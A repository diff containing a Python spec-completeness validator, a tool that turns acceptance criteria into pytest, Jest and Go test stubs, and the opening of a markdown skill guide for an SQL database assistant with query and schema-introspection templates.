    ("non_functional_requirements", "Non-Functional Requirements", [r"^##\s+Non-Functional\s+Requirements"], 10),
    ("acceptance_criteria", "Acceptance Criteria", [r"^##\s+Acceptance\s+Criteria"], 20),
    ("edge_cases", "Edge Cases", [r"^##\s+Edge\s+Cases"], 10),
    ("api_contracts", "API Contracts", [r"^##\s+API\s+Contracts"], 10),
    ("data_models", "Data Models", [r"^##\s+Data\s+Models"], 10),
    ("out_of_scope", "Out of Scope", [r"^##\s+Out\s+of\s+Scope"], 10),
    ("metadata", "Metadata (Author/Date/Status)", [r"\*\*Author:\*\*", r"\*\*Date:\*\*", r"\*\*Status:\*\*"], 5),
]
# The five RFC 2119 requirement keywords, checked as uppercase substrings.
RFC_KEYWORDS = ["MUST", "MUST NOT", "SHOULD", "SHOULD NOT", "MAY"]
# Patterns that indicate placeholder/unfilled content left over from the
# generator template; matched case-insensitively anywhere in the document.
PLACEHOLDER_PATTERNS = [
    r"\[your\s+name\]",
    r"\[list\s+reviewers\]",
    r"\[describe\s+",
    r"\[input/condition\]",
    r"\[precondition\]",
    r"\[action\]",
    r"\[expected\s+result\]",
    r"\[feature/capability\]",
    r"\[operation\]",
    r"\[threshold\]",
    r"\[UI\s+component\]",
    r"\[service\]",
    r"\[percentage\]",
    r"\[number\]",
    r"\[METHOD\]",
    r"\[endpoint\]",
    r"\[Name\]",
    r"\[Entity\s+Name\]",
    r"\[type\]",
    r"\[constraints\]",
    r"\[field\]",
    r"\[reason\]",
]
class SpecValidator:
"""Validates a spec document for completeness and quality."""
def __init__(self, content: str, file_path: str = ""):
self.content = content
self.file_path = file_path
self.lines = content.split("\n")
self.findings: List[Dict[str, Any]] = []
self.section_scores: Dict[str, Dict[str, Any]] = {}
def validate(self) -> Dict[str, Any]:
"""Run all validation checks and return results."""
self._check_sections_present()
self._check_functional_requirements()
self._check_acceptance_criteria()
self._check_edge_cases()
self._check_rfc_keywords()
self._check_api_contracts()
self._check_data_models()
self._check_out_of_scope()
self._check_placeholders()
self._check_traceability()
total_score = self._calculate_score()
return {
"file": self.file_path,
"score": total_score,
"grade": self._score_to_grade(total_score),
"sections": self.section_scores,
"findings": self.findings,
"summary": self._build_summary(total_score),
}
def _add_finding(self, severity: str, section: str, message: str):
"""Record a validation finding."""
self.findings.append({
"severity": severity, # "error", "warning", "info"
"section": section,
"message": message,
})
def _find_section_content(self, header_pattern: str) -> str:
"""Extract content between a section header and the next ## header."""
in_section = False
section_lines = []
for line in self.lines:
if re.match(header_pattern, line, re.IGNORECASE):
in_section = True
continue
if in_section and re.match(r"^##\s+", line):
break
if in_section:
section_lines.append(line)
return "\n".join(section_lines)
def _check_sections_present(self):
"""Check that all required sections exist."""
for key, name, patterns, weight in SECTIONS:
found = False
for pattern in patterns:
for line in self.lines:
if re.search(pattern, line, re.IGNORECASE):
found = True
break
if found:
break
if found:
self.section_scores[key] = {"name": name, "present": True, "score": weight, "max": weight}
else:
self.section_scores[key] = {"name": name, "present": False, "score": 0, "max": weight}
self._add_finding("error", key, f"Missing section: {name}")
def _check_functional_requirements(self):
"""Validate functional requirements format and content."""
content = self._find_section_content(r"^##\s+Functional\s+Requirements")
if not content.strip():
return
fr_pattern = re.compile(r"-\s+FR-(\d+):")
matches = fr_pattern.findall(content)
if not matches:
self._add_finding("error", "functional_requirements", "No numbered requirements found (expected FR-N: format)")
if "functional_requirements" in self.section_scores:
self.section_scores["functional_requirements"]["score"] = max(
0, self.section_scores["functional_requirements"]["score"] - 10
)
return
fr_count = len(matches)
if fr_count < 3:
self._add_finding("warning", "functional_requirements", f"Only {fr_count} requirements found. Most features need 3+.")
# Check for RFC keywords
has_keyword = False
for kw in RFC_KEYWORDS:
if kw in content:
has_keyword = True
break
if not has_keyword:
self._add_finding("warning", "functional_requirements", "No RFC 2119 keywords (MUST/SHOULD/MAY) found.")
def _check_acceptance_criteria(self):
"""Validate acceptance criteria use Given/When/Then format."""
content = self._find_section_content(r"^##\s+Acceptance\s+Criteria")
if not content.strip():
return
ac_pattern = re.compile(r"###\s+AC-(\d+):")
matches = ac_pattern.findall(content)
if not matches:
self._add_finding("error", "acceptance_criteria", "No numbered acceptance criteria found (expected ### AC-N: format)")
if "acceptance_criteria" in self.section_scores:
self.section_scores["acceptance_criteria"]["score"] = max(
0, self.section_scores["acceptance_criteria"]["score"] - 15
)
return
ac_count = len(matches)
# Check Given/When/Then
given_count = len(re.findall(r"(?i)\bgiven\b", content))
when_count = len(re.findall(r"(?i)\bwhen\b", content))
then_count = len(re.findall(r"(?i)\bthen\b", content))
if given_count < ac_count:
self._add_finding("warning", "acceptance_criteria",
f"Found {ac_count} criteria but only {given_count} 'Given' clauses. Each AC needs Given/When/Then.")
if when_count < ac_count:
self._add_finding("warning", "acceptance_criteria",
f"Found {ac_count} criteria but only {when_count} 'When' clauses.")
if then_count < ac_count:
self._add_finding("warning", "acceptance_criteria",
f"Found {ac_count} criteria but only {then_count} 'Then' clauses.")
# Check for FR references
fr_refs = re.findall(r"\(FR-\d+", content)
if not fr_refs:
self._add_finding("warning", "acceptance_criteria",
"No acceptance criteria reference functional requirements (expected (FR-N) in title).")
def _check_edge_cases(self):
"""Validate edge cases section."""
content = self._find_section_content(r"^##\s+Edge\s+Cases")
if not content.strip():
return
ec_pattern = re.compile(r"-\s+EC-(\d+):")
matches = ec_pattern.findall(content)
if not matches:
self._add_finding("warning", "edge_cases", "No numbered edge cases found (expected EC-N: format)")
elif len(matches) < 3:
self._add_finding("warning", "edge_cases", f"Only {len(matches)} edge cases. Consider failure modes for each external dependency.")
def _check_rfc_keywords(self):
"""Check RFC 2119 keywords are used consistently (capitalized)."""
# Look for lowercase must/should/may that might be intended as RFC keywords
context_content = self._find_section_content(r"^##\s+Functional\s+Requirements")
context_content += self._find_section_content(r"^##\s+Non-Functional\s+Requirements")
for kw in ["must", "should", "may"]:
# Find lowercase usage in requirement-like sentences
pattern = rf"(?:system|service|API|endpoint)\s+{kw}\s+"
if re.search(pattern, context_content):
self._add_finding("warning", "rfc_keywords",
f"Found lowercase '{kw}' in requirements. RFC 2119 keywords should be UPPERCASE: {kw.upper()}")
def _check_api_contracts(self):
"""Validate API contracts section."""
content = self._find_section_content(r"^##\s+API\s+Contracts")
if not content.strip():
return
# Check for at least one endpoint definition
has_endpoint = bool(re.search(r"(GET|POST|PUT|PATCH|DELETE)\s+/", content))
if not has_endpoint:
self._add_finding("warning", "api_contracts", "No HTTP method + path found (expected e.g., POST /api/endpoint)")
# Check for request/response definitions
has_interface = bool(re.search(r"interface\s+\w+", content))
if not has_interface:
self._add_finding("info", "api_contracts", "No TypeScript interfaces found. Consider defining request/response shapes.")
def _check_data_models(self):
    """Warn when the Data Models section contains no markdown tables."""
    body = self._find_section_content(r"^##\s+Data\s+Models")
    if not body.strip():
        return
    # A markdown table row has at least two pipe-delimited cells.
    if re.search(r"\|.*\|.*\|", body) is None:
        self._add_finding("warning", "data_models", "No table-formatted data models found. Use | Field | Type | Constraints | format.")
def _check_out_of_scope(self):
    """Check the Out of Scope section for numbered OS-N exclusions."""
    body = self._find_section_content(r"^##\s+Out\s+of\s+Scope")
    if not body.strip():
        return
    exclusions = re.findall(r"-\s+OS-(\d+):", body)
    if not exclusions:
        self._add_finding("warning", "out_of_scope", "No numbered exclusions found (expected OS-N: format)")
    elif len(exclusions) < 2:
        # Exactly one exclusion: nudge the author to think harder about scope.
        self._add_finding("info", "out_of_scope", "Only 1 exclusion listed. Consider what was deliberately left out.")
def _check_placeholders(self):
    """Check for unfilled placeholder text (e.g. [your name], [describe ...]).

    Emits a single warning with the total placeholder count across the
    whole document, then penalizes every section that is present.
    """
    placeholder_count = 0
    for pattern in PLACEHOLDER_PATTERNS:
        matches = re.findall(pattern, self.content, re.IGNORECASE)
        placeholder_count += len(matches)
    if placeholder_count > 0:
        self._add_finding("warning", "placeholders",
            f"Found {placeholder_count} placeholder(s) that need to be filled in (e.g., [your name], [describe ...]).")
        # Deduct a flat penalty (up to 3 points, floored at 0) from each
        # present section. NOTE(review): despite the original "proportionally"
        # comment, the deduction does not scale with the number of
        # placeholders found — confirm this is intended.
        for key in self.section_scores:
            if self.section_scores[key]["present"]:
                deduction = min(3, self.section_scores[key]["score"])
                self.section_scores[key]["score"] = max(0, self.section_scores[key]["score"] - deduction)
def _check_traceability(self):
    """Verify every FR-N declared in Functional Requirements is referenced by some acceptance criterion."""
    ac_text = self._find_section_content(r"^##\s+Acceptance\s+Criteria")
    fr_text = self._find_section_content(r"^##\s+Functional\s+Requirements")
    if not ac_text.strip() or not fr_text.strip():
        # One of the two sections is absent; presence checks cover that case.
        return
    declared = set(re.findall(r"FR-(\d+)", fr_text))
    referenced = set(re.findall(r"FR-(\d+)", ac_text))
    orphaned = declared - referenced
    if orphaned:
        listing = ", ".join(f"FR-{num}" for num in sorted(orphaned))
        self._add_finding("warning", "traceability",
            f"Functional requirements without acceptance criteria: {listing}")
def _calculate_score(self) -> int:
    """Return the overall 0-100 completeness score.

    The score is the percentage of section points earned, minus 5 points
    per error finding and 2 per warning, clamped to the 0-100 range.
    """
    earned = sum(entry["score"] for entry in self.section_scores.values())
    possible = sum(entry["max"] for entry in self.section_scores.values())
    if possible == 0:
        return 0
    severities = [finding["severity"] for finding in self.findings]
    penalty = 5 * severities.count("error") + 2 * severities.count("warning")
    percentage = round((earned / possible) * 100)
    return max(0, min(100, percentage - penalty))
@staticmethod
def _score_to_grade(score: int) -> str:
    """Map a 0-100 score onto the letter grades A-F (F below 60)."""
    for cutoff, grade in ((90, "A"), (80, "B"), (70, "C"), (60, "D")):
        if score >= cutoff:
            return grade
    return "F"
def _build_summary(self, score: int) -> str:
    """Render findings and the per-section breakdown as a human-readable report."""
    by_severity = {"error": [], "warning": [], "info": []}
    for finding in self.findings:
        bucket = by_severity.get(finding["severity"])
        if bucket is not None:
            bucket.append(finding)
    out = [
        f"Spec Completeness Score: {score}/100 (Grade: {self._score_to_grade(score)})",
        f"Errors: {len(by_severity['error'])}, Warnings: {len(by_severity['warning'])}, Info: {len(by_severity['info'])}",
        "",
    ]
    # One titled group per severity, each followed by a blank separator line.
    for severity, heading in (("error", "ERRORS (must fix):"),
                              ("warning", "WARNINGS (should fix):"),
                              ("info", "INFO:")):
        group = by_severity[severity]
        if not group:
            continue
        out.append(heading)
        out.extend(f"  [{item['section']}] {item['message']}" for item in group)
        out.append("")
    out.append("Section Breakdown:")
    for data in self.section_scores.values():
        status = "PRESENT" if data["present"] else "MISSING"
        out.append(f"  {data['name']}: {data['score']}/{data['max']} ({status})")
    return "\n".join(out)
def format_human(result: Dict[str, Any]) -> str:
    """Render a validation-result dict as a human-readable report string."""
    banner = "=" * 60
    report = [banner, "SPEC VALIDATION REPORT", banner, ""]
    # The file line is optional: omitted when no path was recorded.
    if result["file"]:
        report.append(f"File: {result['file']}")
        report.append("")
    report.append(result["summary"])
    return "\n".join(report)
def main():
    """CLI entry point: validate a spec file and exit with a status code.

    Exit codes: 0 = clean, 1 = warnings only, 2 = errors, a missing/empty
    file, or (with --strict) a score below 80.
    """
    arg_parser = argparse.ArgumentParser(
        description="Validate a feature specification for completeness and quality.",
        epilog="Example: python spec_validator.py --file spec.md --strict",
    )
    arg_parser.add_argument("--file", "-f", required=True,
                            help="Path to the spec markdown file")
    arg_parser.add_argument("--strict", action="store_true",
                            help="Exit with code 2 if score is below 80")
    arg_parser.add_argument("--json", action="store_true", dest="json_flag",
                            help="Output results as JSON")
    args = arg_parser.parse_args()

    spec_path = Path(args.file)
    if not spec_path.exists():
        print(f"Error: File not found: {spec_path}", file=sys.stderr)
        sys.exit(2)
    text = spec_path.read_text(encoding="utf-8")
    if not text.strip():
        print(f"Error: File is empty: {spec_path}", file=sys.stderr)
        sys.exit(2)

    result = SpecValidator(text, str(spec_path)).validate()
    print(json.dumps(result, indent=2) if args.json_flag else format_human(result))

    # Exit-code policy: --strict score failures and errors are fatal (2),
    # warnings alone are advisory (1).
    severities = {finding["severity"] for finding in result["findings"]}
    if args.strict and result["score"] < 80:
        sys.exit(2)
    if "error" in severities:
        sys.exit(2)
    if "warning" in severities:
        sys.exit(1)
    sys.exit(0)
# Run as a script; importing this module has no side effects.
if __name__ == "__main__":
    main()

View File

@@ -0,0 +1,431 @@
#!/usr/bin/env python3
"""
Test Extractor - Extracts test case stubs from a feature specification.
Parses acceptance criteria (Given/When/Then) and edge cases from a spec
document, then generates test stubs for the specified framework.
Supported frameworks: pytest, jest, go-test
Exit codes: 0 = success, 1 = warnings (some criteria unparseable), 2 = critical error
No external dependencies - uses only Python standard library.
"""
import argparse
import json
import re
import sys
import textwrap
from pathlib import Path
from typing import Dict, List, Any, Optional, Tuple
class SpecParser:
    """Parses spec documents to extract testable criteria.

    The parser is line-oriented: it scans markdown for ``### AC-N:``
    headings (acceptance criteria with Given/When/Then bodies), ``- EC-N:``
    bullets inside the Edge Cases section, and the first H1 as the title.
    """

    def __init__(self, content: str):
        self.content = content
        self.lines = content.split("\n")

    def extract_acceptance_criteria(self) -> List[Dict[str, Any]]:
        """Extract AC-N blocks with Given/When/Then clauses.

        Returns a list of dicts with keys: ``id``, ``name``, ``references``
        (FR ids from the heading's parenthetical), ``given``, ``when``,
        ``then`` (list of clauses), and the raw ``body`` text.
        """
        criteria = []
        # "### AC-3: Title (FR-1, FR-2)" -> id, title, optional reference list.
        ac_pattern = re.compile(r"###\s+AC-(\d+):\s*(.+?)(?:\s*\(([^)]+)\))?\s*$")
        in_ac = False
        current_ac: Optional[Dict[str, Any]] = None
        body_lines: List[str] = []
        for line in self.lines:
            match = ac_pattern.match(line)
            if match:
                # A new AC heading closes the previous one.
                if current_ac is not None:
                    current_ac["body"] = "\n".join(body_lines).strip()
                    self._parse_gwt(current_ac)
                    criteria.append(current_ac)
                ac_id = int(match.group(1))
                name = match.group(2).strip()
                refs = match.group(3).strip() if match.group(3) else ""
                current_ac = {
                    "id": f"AC-{ac_id}",
                    "name": name,
                    "references": [r.strip() for r in refs.split(",") if r.strip()] if refs else [],
                    "given": "",
                    "when": "",
                    "then": [],
                    "body": "",
                }
                body_lines = []
                in_ac = True
            elif in_ac:
                # A new "## " section (but not another "### " heading) ends
                # the acceptance-criteria region.
                if re.match(r"^##\s+", line) and not re.match(r"^###\s+", line):
                    in_ac = False
                    if current_ac is not None:
                        current_ac["body"] = "\n".join(body_lines).strip()
                        self._parse_gwt(current_ac)
                        criteria.append(current_ac)
                        current_ac = None
                else:
                    body_lines.append(line)
        # Flush the final AC if the document ended inside one.
        if current_ac is not None:
            current_ac["body"] = "\n".join(body_lines).strip()
            self._parse_gwt(current_ac)
            criteria.append(current_ac)
        return criteria

    def extract_edge_cases(self) -> List[Dict[str, Any]]:
        """Extract EC-N edge case items from the Edge Cases section.

        Each bullet has the form ``- EC-1: condition -> behavior``, where an
        ASCII "->" or a Unicode arrow separates condition from behavior.
        """
        edge_cases = []
        # BUGFIX: the original pattern repeated the "\s*->\s*" alternative;
        # the dead duplicate has been removed (behavior is unchanged).
        ec_pattern = re.compile(r"-\s+EC-(\d+):\s*(.+?)(?:\s*->\s*|\s*→\s*)(.+)")
        in_section = False
        for line in self.lines:
            if re.match(r"^##\s+Edge\s+Cases", line, re.IGNORECASE):
                in_section = True
                continue
            if in_section and re.match(r"^##\s+", line):
                # The next "## " heading terminates the section.
                break
            if in_section:
                match = ec_pattern.match(line.strip())
                if match:
                    edge_cases.append({
                        "id": f"EC-{match.group(1)}",
                        "condition": match.group(2).strip().rstrip("."),
                        "behavior": match.group(3).strip().rstrip("."),
                    })
        return edge_cases

    def extract_spec_title(self) -> str:
        """Return the first H1 title, stripping an optional "Spec:" prefix."""
        for line in self.lines:
            match = re.match(r"^#\s+(?:Spec:\s*)?(.+)", line)
            if match:
                return match.group(1).strip()
        return "UnknownFeature"

    @staticmethod
    def _parse_gwt(ac: Dict[str, Any]):
        """Parse Given/When/Then clauses out of an AC body (mutates *ac*).

        "And" lines attach to whichever clause came last: extra Then lines
        are appended to the list, while Given/When continuations are joined
        with " AND ".
        """
        body = ac["body"]
        lines = body.split("\n")
        current_section = None
        for line in lines:
            stripped = line.strip()
            if not stripped:
                continue
            lower = stripped.lower()
            if lower.startswith("given "):
                current_section = "given"
                ac["given"] = stripped[6:].strip()
            elif lower.startswith("when "):
                current_section = "when"
                ac["when"] = stripped[5:].strip()
            elif lower.startswith("then "):
                current_section = "then"
                ac["then"].append(stripped[5:].strip())
            elif lower.startswith("and "):
                if current_section == "then":
                    ac["then"].append(stripped[4:].strip())
                elif current_section == "given":
                    ac["given"] += " AND " + stripped[4:].strip()
                elif current_section == "when":
                    ac["when"] += " AND " + stripped[4:].strip()
def _sanitize_name(name: str) -> str:
    """Turn a human-readable title into a valid snake_case identifier."""
    # Drop parenthetical references such as "(FR-1)".
    without_refs = re.sub(r"\([^)]*\)", "", name)
    # Collapse every run of non-alphanumerics into a single underscore.
    underscored = re.sub(r"[^a-zA-Z0-9]+", "_", without_refs)
    cleaned = underscored.strip("_").lower()
    return cleaned or "unnamed"
def _to_pascal_case(name: str) -> str:
    """Convert a title to PascalCase (used for class and Go test names)."""
    return "".join(part.capitalize() for part in _sanitize_name(name).split("_") if part)
class PytestGenerator:
    """Generates pytest test stubs.

    Output is a single module containing one test class with a stub method
    per acceptance criterion and per edge case. Every stub raises
    NotImplementedError until implemented.
    """

    def generate(self, title: str, criteria: List[Dict], edge_cases: List[Dict]) -> str:
        """Render the pytest module source for *title* and return it as a string."""
        class_name = "Test" + _to_pascal_case(title)
        # NOTE(review): the leading whitespace inside the emitted source
        # lines below appears collapsed in this copy — verify the generated
        # stubs indent as valid Python.
        lines = [
            '"""',
            f"Test suite for: {title}",
            f"Auto-generated from spec. {len(criteria)} acceptance criteria, {len(edge_cases)} edge cases.",
            "",
            "All tests are stubs — implement the test body to make them pass.",
            '"""',
            "",
            "import pytest",
            "",
            "",
            f"class {class_name}:",
            f' """Tests for {title}."""',
            "",
        ]
        # One stub method per acceptance criterion; names embed the AC id.
        for ac in criteria:
            method_name = f"test_{ac['id'].lower().replace('-', '')}_{_sanitize_name(ac['name'])}"
            docstring = f'{ac["id"]}: {ac["name"]}'
            ref_str = f" [{', '.join(ac['references'])}]" if ac["references"] else ""
            lines.append(f" def {method_name}(self):")
            lines.append(f' """{docstring}{ref_str}"""')
            if ac["given"]:
                lines.append(f" # Given {ac['given']}")
            if ac["when"]:
                lines.append(f" # When {ac['when']}")
            for t in ac["then"]:
                lines.append(f" # Then {t}")
            lines.append(' raise NotImplementedError("Implement this test")')
            lines.append("")
        if edge_cases:
            lines.append(" # --- Edge Cases ---")
            lines.append("")
            # One stub per edge case, documenting condition and expectation.
            for ec in edge_cases:
                method_name = f"test_{ec['id'].lower().replace('-', '')}_{_sanitize_name(ec['condition'])}"
                lines.append(f" def {method_name}(self):")
                lines.append(f' """{ec["id"]}: {ec["condition"]} -> {ec["behavior"]}"""')
                lines.append(f" # Condition: {ec['condition']}")
                lines.append(f" # Expected: {ec['behavior']}")
                lines.append(' raise NotImplementedError("Implement this test")')
                lines.append("")
        return "\n".join(lines)
class JestGenerator:
    """Generates Jest/Vitest test stubs (TypeScript).

    Output is a single describe() block with one it() stub per acceptance
    criterion and per edge case; every stub throws until implemented.
    """

    def generate(self, title: str, criteria: List[Dict], edge_cases: List[Dict]) -> str:
        """Render the TypeScript test source for *title* and return it as a string."""
        # NOTE(review): leading whitespace inside the emitted lines appears
        # collapsed in this copy — verify the generated file indents sanely.
        lines = [
            f"/**",
            f" * Test suite for: {title}",
            f" * Auto-generated from spec. {len(criteria)} acceptance criteria, {len(edge_cases)} edge cases.",
            f" *",
            f" * All tests are stubs — implement the test body to make them pass.",
            f" */",
            "",
            f'describe("{title}", () => {{',
        ]
        # One it() stub per acceptance criterion; the name embeds the AC id.
        for ac in criteria:
            ref_str = f" [{', '.join(ac['references'])}]" if ac["references"] else ""
            test_name = f"{ac['id']}: {ac['name']}{ref_str}"
            lines.append(f' it("{test_name}", () => {{')
            if ac["given"]:
                lines.append(f" // Given {ac['given']}")
            if ac["when"]:
                lines.append(f" // When {ac['when']}")
            for t in ac["then"]:
                lines.append(f" // Then {t}")
            lines.append("")
            lines.append(' throw new Error("Not implemented");')
            lines.append(" });")
            lines.append("")
        if edge_cases:
            lines.append(" // --- Edge Cases ---")
            lines.append("")
            # One it() stub per edge case.
            for ec in edge_cases:
                test_name = f"{ec['id']}: {ec['condition']}"
                lines.append(f' it("{test_name}", () => {{')
                lines.append(f" // Condition: {ec['condition']}")
                lines.append(f" // Expected: {ec['behavior']}")
                lines.append("")
                lines.append(' throw new Error("Not implemented");')
                lines.append(" });")
                lines.append("")
        lines.append("});")
        lines.append("")
        return "\n".join(lines)
class GoTestGenerator:
    """Generates Go test stubs.

    Emits a single *_test.go file whose package name is derived from the
    first word of the spec title; every stub calls t.Fatal until implemented.
    """

    def generate(self, title: str, criteria: List[Dict], edge_cases: List[Dict]) -> str:
        """Render the Go test source for *title* and return it as a string."""
        # Go package names must be simple identifiers; use the first word.
        package_name = _sanitize_name(title).split("_")[0] or "feature"
        lines = [
            f"package {package_name}_test",
            "",
            "import (",
            '\t"testing"',
            ")",
            "",
            f"// Test suite for: {title}",
            f"// Auto-generated from spec. {len(criteria)} acceptance criteria, {len(edge_cases)} edge cases.",
            f"// All tests are stubs — implement the test body to make them pass.",
            "",
        ]
        # One Test* function per acceptance criterion.
        for ac in criteria:
            func_name = "Test" + _to_pascal_case(ac["id"] + " " + ac["name"])
            ref_str = f" [{', '.join(ac['references'])}]" if ac["references"] else ""
            lines.append(f"// {ac['id']}: {ac['name']}{ref_str}")
            lines.append(f"func {func_name}(t *testing.T) {{")
            if ac["given"]:
                lines.append(f"\t// Given {ac['given']}")
            if ac["when"]:
                lines.append(f"\t// When {ac['when']}")
            for then_clause in ac["then"]:
                lines.append(f"\t// Then {then_clause}")
            lines.append("")
            lines.append('\tt.Fatal("Not implemented")')
            lines.append("}")
            lines.append("")
        if edge_cases:
            lines.append("// --- Edge Cases ---")
            lines.append("")
            # One Test* function per edge case.
            for ec in edge_cases:
                func_name = "Test" + _to_pascal_case(ec["id"] + " " + ec["condition"])
                lines.append(f"// {ec['id']}: {ec['condition']} -> {ec['behavior']}")
                lines.append(f"func {func_name}(t *testing.T) {{")
                lines.append(f"\t// Condition: {ec['condition']}")
                lines.append(f"\t// Expected: {ec['behavior']}")
                lines.append("")
                lines.append('\tt.Fatal("Not implemented")')
                lines.append("}")
                lines.append("")
        return "\n".join(lines)
# Maps each --framework CLI choice to its generator class.
GENERATORS = {
    "pytest": PytestGenerator,
    "jest": JestGenerator,
    "go-test": GoTestGenerator,
}
# Conventional output-file suffix per framework. NOTE(review): not
# referenced by main() in this file — main() writes to whatever path the
# user supplies via --output.
FILE_EXTENSIONS = {
    "pytest": ".py",
    "jest": ".test.ts",
    "go-test": "_test.go",
}
def main():
    """CLI entry point: parse a spec file and emit test stubs or JSON.

    Exit codes: 0 = success, 1 = generated with warnings (some criteria
    unparseable), 2 = critical error (missing/empty file, nothing found).
    """
    parser = argparse.ArgumentParser(
        description="Extract test case stubs from a feature specification.",
        epilog="Example: python test_extractor.py --file spec.md --framework pytest --output tests/test_feature.py",
    )
    parser.add_argument(
        "--file",
        "-f",
        required=True,
        help="Path to the spec markdown file",
    )
    parser.add_argument(
        "--framework",
        choices=list(GENERATORS.keys()),
        default="pytest",
        help="Target test framework (default: pytest)",
    )
    parser.add_argument(
        "--output",
        "-o",
        default=None,
        help="Output file path (default: stdout)",
    )
    parser.add_argument(
        "--json",
        action="store_true",
        dest="json_flag",
        help="Output extracted criteria as JSON instead of test code",
    )
    args = parser.parse_args()
    file_path = Path(args.file)
    if not file_path.exists():
        print(f"Error: File not found: {file_path}", file=sys.stderr)
        sys.exit(2)
    content = file_path.read_text(encoding="utf-8")
    if not content.strip():
        print(f"Error: File is empty: {file_path}", file=sys.stderr)
        sys.exit(2)
    # Parse the spec once; every output mode shares the extracted data.
    spec_parser = SpecParser(content)
    title = spec_parser.extract_spec_title()
    criteria = spec_parser.extract_acceptance_criteria()
    edge_cases = spec_parser.extract_edge_cases()
    if not criteria and not edge_cases:
        print("Error: No acceptance criteria or edge cases found in spec.", file=sys.stderr)
        sys.exit(2)
    # An AC with neither Given nor When was probably not written in
    # Given/When/Then form; surface it as a warning rather than failing.
    warnings = []
    for ac in criteria:
        if not ac["given"] and not ac["when"]:
            warnings.append(f"{ac['id']}: Could not parse Given/When/Then — check format.")
    if args.json_flag:
        # JSON mode emits the raw extraction (useful for tooling pipelines).
        result = {
            "spec_title": title,
            "framework": args.framework,
            "acceptance_criteria": criteria,
            "edge_cases": edge_cases,
            "warnings": warnings,
            "counts": {
                "acceptance_criteria": len(criteria),
                "edge_cases": len(edge_cases),
                "total_test_cases": len(criteria) + len(edge_cases),
            },
        }
        output = json.dumps(result, indent=2)
    else:
        generator_class = GENERATORS[args.framework]
        generator = generator_class()
        output = generator.generate(title, criteria, edge_cases)
    if args.output:
        # Write to the requested path, creating parent directories as needed;
        # the progress line goes to stderr so stdout stays clean.
        out_path = Path(args.output)
        out_path.parent.mkdir(parents=True, exist_ok=True)
        out_path.write_text(output, encoding="utf-8")
        total = len(criteria) + len(edge_cases)
        print(f"Generated {total} test stubs -> {out_path}", file=sys.stderr)
    else:
        print(output)
    if warnings:
        for w in warnings:
            print(f"Warning: {w}", file=sys.stderr)
        sys.exit(1)
    sys.exit(0)
# Run as a script; importing this module has no side effects.
if __name__ == "__main__":
    main()

View File

@@ -0,0 +1,457 @@
---
name: "sql-database-assistant"
description: "Use when the user asks to write SQL queries, optimize database performance, generate migrations, explore database schemas, or work with ORMs like Prisma, Drizzle, TypeORM, or SQLAlchemy."
---
# SQL Database Assistant - POWERFUL Tier Skill
## Overview
The operational companion to database design. While **database-designer** focuses on schema architecture and **database-schema-designer** handles ERD modeling, this skill covers the day-to-day: writing queries, optimizing performance, generating migrations, and bridging the gap between application code and database engines.
### Core Capabilities
- **Natural Language to SQL** — translate requirements into correct, performant queries
- **Schema Exploration** — introspect live databases across PostgreSQL, MySQL, SQLite, SQL Server
- **Query Optimization** — EXPLAIN analysis, index recommendations, N+1 detection, rewrite patterns
- **Migration Generation** — up/down scripts, zero-downtime strategies, rollback plans
- **ORM Integration** — Prisma, Drizzle, TypeORM, SQLAlchemy patterns and escape hatches
- **Multi-Database Support** — dialect-aware SQL with compatibility guidance
### Tools
| Script | Purpose |
|--------|---------|
| `scripts/query_optimizer.py` | Static analysis of SQL queries for performance issues |
| `scripts/migration_generator.py` | Generate migration file templates from change descriptions |
| `scripts/schema_explorer.py` | Generate schema documentation from introspection queries |
---
## Natural Language to SQL
### Translation Patterns
When converting requirements to SQL, follow this sequence:
1. **Identify entities** — map nouns to tables
2. **Identify relationships** — map verbs to JOINs or subqueries
3. **Identify filters** — map adjectives/conditions to WHERE clauses
4. **Identify aggregations** — map "total", "average", "count" to GROUP BY
5. **Identify ordering** — map "top", "latest", "highest" to ORDER BY + LIMIT
### Common Query Templates
**Top-N per group (window function)**
```sql
SELECT * FROM (
SELECT *, ROW_NUMBER() OVER (PARTITION BY department_id ORDER BY salary DESC) AS rn
FROM employees
) ranked WHERE rn <= 3;
```
**Running totals**
```sql
SELECT date, amount,
SUM(amount) OVER (ORDER BY date ROWS BETWEEN UNBOUNDED PRECEDING AND CURRENT ROW) AS running_total
FROM transactions;
```
**Gap detection**
```sql
SELECT curr.id, curr.seq_num, prev.seq_num AS prev_seq
FROM records curr
LEFT JOIN records prev ON prev.seq_num = curr.seq_num - 1
WHERE prev.id IS NULL AND curr.seq_num > 1;
```
**UPSERT (PostgreSQL)**
```sql
INSERT INTO settings (key, value, updated_at)
VALUES ('theme', 'dark', NOW())
ON CONFLICT (key) DO UPDATE SET value = EXCLUDED.value, updated_at = EXCLUDED.updated_at;
```
**UPSERT (MySQL)**
```sql
INSERT INTO settings (key_name, value, updated_at)
VALUES ('theme', 'dark', NOW())
ON DUPLICATE KEY UPDATE value = VALUES(value), updated_at = VALUES(updated_at);
```
> See references/query_patterns.md for JOINs, CTEs, window functions, JSON operations, and more.
---
## Schema Exploration
### Introspection Queries
**PostgreSQL — list tables and columns**
```sql
SELECT table_name, column_name, data_type, is_nullable, column_default
FROM information_schema.columns
WHERE table_schema = 'public'
ORDER BY table_name, ordinal_position;
```
**PostgreSQL — foreign keys**
```sql
SELECT tc.table_name, kcu.column_name,
ccu.table_name AS foreign_table, ccu.column_name AS foreign_column
FROM information_schema.table_constraints tc
JOIN information_schema.key_column_usage kcu ON tc.constraint_name = kcu.constraint_name
JOIN information_schema.constraint_column_usage ccu ON tc.constraint_name = ccu.constraint_name
WHERE tc.constraint_type = 'FOREIGN KEY';
```
**MySQL — table sizes**
```sql
SELECT table_name, table_rows,
ROUND(data_length / 1024 / 1024, 2) AS data_mb,
ROUND(index_length / 1024 / 1024, 2) AS index_mb
FROM information_schema.tables
WHERE table_schema = DATABASE()
ORDER BY data_length DESC;
```
**SQLite — schema dump**
```sql
SELECT name, sql FROM sqlite_master WHERE type = 'table' ORDER BY name;
```
**SQL Server — columns with types**
```sql
SELECT t.name AS table_name, c.name AS column_name,
ty.name AS data_type, c.max_length, c.is_nullable
FROM sys.columns c
JOIN sys.tables t ON c.object_id = t.object_id
JOIN sys.types ty ON c.user_type_id = ty.user_type_id
ORDER BY t.name, c.column_id;
```
### Generating Documentation from Schema
Use `scripts/schema_explorer.py` to produce markdown or JSON documentation:
```bash
python scripts/schema_explorer.py --dialect postgres --tables all --format md
python scripts/schema_explorer.py --dialect mysql --tables users,orders --format json --json
```
---
## Query Optimization
### EXPLAIN Analysis Workflow
